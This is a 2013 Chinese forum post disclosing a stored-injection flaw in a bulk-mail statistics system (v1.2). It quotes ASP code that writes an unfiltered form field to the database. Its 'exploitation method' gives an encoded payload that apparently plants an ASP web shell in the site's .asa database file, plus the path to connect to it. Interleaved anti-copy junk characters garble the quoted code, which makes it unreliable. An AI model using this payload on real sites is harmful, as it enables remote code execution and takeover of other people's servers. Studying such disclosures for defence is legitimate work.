找回密码
 立即注册
查看: 3027|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp ' K8 K# _: q3 i4 N- p: z
' K% R9 r- H6 E7 N5 f& ~
IF Request.QueryString("Action")="del" Then
) J* w0 A) A& t' TID=Request.QueryString("ID")
: X; I4 R! r- q8 h0 H* k1 QIF Countss ("tui","Fenlei",ID )<>0 then $ L; t8 q# C; K, e3 f) |5 [5 L
'略
# c) b. I; \! r$ c( M; GIF Request.QueryString("Action")="Add" Then
% K' `7 v0 A; @8 `) w! u# n0 rTname=Request.Form("Typename")
/ s7 i3 H7 I+ T7 B5 z2 NSet Rs=Server.CreateObject("adodb.Recordset") / d1 ]  n7 F( i8 n. x" t) ~
Sql="Select * From Fenlei Order by id Desc "
& f9 H* O  z5 ^0 CRs.Open Sql,Conn,1,3 3 t! G) G$ h/ s0 _
Rs.Addnew
) U% u( x" R' c6 g4 V! XRs("Typename")=Tname
- e% k& p8 y& o" _/ B4 n1 J'略
" F% ?$ `' |5 E/ v" [Set Rs=Server.CreateObject("adodb.Recordset")
, D7 `: c+ p* m! X" M) {7 jSql="Select * From Fenlei Order by id Desc "
" W& @- L$ u7 A$ T8 XRs.Open Sql,Conn,1,1 1 D/ Q+ P, t; B6 }' |$ [; Y
'略
$ N, w0 q4 D( Z2 b5 ?9 o4 d%>
/ E( q" \! o) Y
  P6 ]) D  O* K& k$ D 8 e/ I; D# }+ K2 J: G2 Q$ ]4 f
$ I8 |  ~2 ]0 i
没有过滤,直接写入数据库。  ]+ p0 r2 ]/ A; d

) n- z- z) G8 e" R, C7 U) n利用方法:
, `, w/ h1 ^8 s) l / k& [+ e8 S  a  Y, e, b, w
插入:┼攠數畣整爠煥敵瑳∨≡┩>
) I" y8 v# [! z2 r0 ^/ P - x0 d- K+ K2 F9 Q8 X
. D) o9 W( p9 h- Z/ V" I
连接: http://www.xxx.com/###tongbaner.asa % u- `2 h+ O7 o+ m; b
'默认安装文件: 6 t, q& |  M, y8 V7 O, ?7 u
'install.asp+ u) ?- r* m1 g* x3 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表